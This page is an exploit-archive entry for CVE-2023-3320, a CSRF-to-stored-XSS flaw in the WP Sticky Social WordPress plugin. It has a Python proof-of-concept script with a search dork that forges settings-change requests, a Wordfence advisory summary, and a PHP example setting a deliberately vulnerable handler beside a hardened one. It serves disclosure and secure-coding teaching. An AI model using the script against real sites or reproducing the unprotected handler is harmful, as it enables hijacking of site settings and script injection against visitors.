WordPress WP Sticky Social 1.0.1 CSRF / Cross Site Scripting

WordPress WP Sticky Social plugin version 1.0.1 suffers from a cross-site request forgery vulnerability that can be chained into stored cross-site scripting.

Packet Storm
```python
# Exploit Title: WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)
# Dork: inurl:~/admin/views/admin.php
# Date: 2023-06-20
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://wordpress.org/plugins/wp-sticky-social
# Version: 1.0.1 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-3320

import requests
import hashlib
import time

# Target settings page of the plugin
url = "http://example.com/wp-admin/admin.php?page=wpss_settings"

# User agent string sent with the request
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"

# Value sent in the wpss_nonce field. This is a locally computed SHA-256 of the
# current timestamp, not a WordPress nonce; it is only accepted because the
# vulnerable plugin never validates the nonce at all.
nonce = hashlib.sha256(str(time.time()).encode('utf-8')).hexdigest()

# POST body: the settings fields to overwrite
payload = {
    "wpss_nonce": nonce,
    "wpss_setting_1": "value_1",
    "wpss_setting_2": "value_2",
    # Add additional settings as needed
}

# Request headers. The Cookie value is a placeholder: the CSRF attack relies on
# the victim administrator's own browser attaching their real session cookie.
headers = {
    "User-Agent": user_agent,
    "Referer": url,
    "Cookie": "wordpress_logged_in=1; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26uploader%3Dwp-plupload%26urlbutton%3Dfile; wp-settings-time-1=1495271983",
    # Add additional headers as needed
}

# Send the forged settings-update request
response = requests.post(url, data=payload, headers=headers)

# Report only the HTTP status; a 200 does not by itself prove the settings changed
if response.status_code == 200:
    print("Request successful")
else:
    print("Request failed")
```

Related news

CVE-2023-3320: WP Sticky Social <= 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting — Wordfence Intelligence

The WP Sticky Social plugin for WordPress is vulnerable to cross-site request forgery in versions up to and including 1.0.1, because the ~/admin/views/admin.php file saves settings without validating a nonce. An unauthenticated attacker who can trick a site administrator into performing an action such as clicking a link can therefore modify the plugin's settings through a forged request and inject malicious web scripts, which are then stored and rendered to other users.
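The following is an added illustration of the bug class the Wordfence entry describes, written for this page; it is not the WP Sticky Social plugin's own code and not part of the advisory. It shows a minimal WordPress admin settings handler in the vulnerable form (no nonce check, no capability check, raw input stored, stored value echoed unescaped) next to the hardened form. The field names wpss_nonce, wpss_setting_1 and wpss_setting_2 are taken from the published PoC; the option name wpss_example_settings, the nonce action string and the function names are assumptions chosen for the example.

```php
<?php
// Illustrative WordPress settings handler. NOT the WP Sticky Social plugin's
// code. Field names come from the PoC; option name, action string and
// function names are assumptions for this example.

// ---------- VULNERABLE PATTERN ----------
// Any POST reaching the settings page is applied. A page on an attacker's
// site can auto-submit such a form from an administrator's browser, which
// attaches the admin's real session cookie (CSRF).
function wpss_example_save_settings_vulnerable() {
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] ) {
        return;
    }
    // $_POST['wpss_nonce'] is never looked at, so its value is irrelevant.
    $settings = array(
        'setting_1' => $_POST['wpss_setting_1'], // attacker-controlled, unsanitized
        'setting_2' => $_POST['wpss_setting_2'],
    );
    update_option( 'wpss_example_settings', $settings );
}

function wpss_example_render_field_vulnerable() {
    $settings = get_option( 'wpss_example_settings', array() );
    // Unescaped output: a stored value such as  "><script>...</script>
    // breaks out of the attribute and runs for every admin who opens the
    // page (stored XSS).
    echo '<input type="text" name="wpss_setting_1" value="' . $settings['setting_1'] . '">';
}

// ---------- HARDENED PATTERN ----------
function wpss_example_render_form_hardened() {
    $settings = get_option( 'wpss_example_settings', array() );
    $value    = isset( $settings['setting_1'] ) ? $settings['setting_1'] : '';
    echo '<form method="post">';
    // Emits a hidden field named wpss_nonce whose value is bound to the
    // action 'wpss_save_settings' and to the current user's session token.
    // A third-party page cannot read or predict it.
    wp_nonce_field( 'wpss_save_settings', 'wpss_nonce' );
    // Escape on output so a stored value cannot break out of the attribute.
    echo '<input type="text" name="wpss_setting_1" value="' . esc_attr( $value ) . '">';
    submit_button();
    echo '</form>';
}

function wpss_example_save_settings_hardened() {
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] ) {
        return;
    }
    // 1. Capability check: nonces prove intent, not authorization, so this
    //    is needed in addition to the nonce check.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', 'Forbidden', array( 'response' => 403 ) );
    }
    // 2. CSRF check: aborts the request unless $_POST['wpss_nonce'] is a
    //    valid, unexpired nonce for 'wpss_save_settings' issued to this user.
    check_admin_referer( 'wpss_save_settings', 'wpss_nonce' );
    // 3. Sanitize on input (stripslashes first, since WP adds magic quotes).
    $settings = array(
        'setting_1' => sanitize_text_field( wp_unslash( $_POST['wpss_setting_1'] ?? '' ) ),
        'setting_2' => esc_url_raw( wp_unslash( $_POST['wpss_setting_2'] ?? '' ) ),
    );
    update_option( 'wpss_example_settings', $settings );
}
```

Two things to check when verifying a fix for this class of bug: the save path must call check_admin_referer() or wp_verify_nonce() before touching any option, and the nonce check must sit beside a capability check, since a nonce alone would still let any logged-in user with a valid nonce for that action change settings. Output escaping (esc_attr(), esc_html(), esc_url()) is what removes the stored XSS even if a bad value reaches the database by another route.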
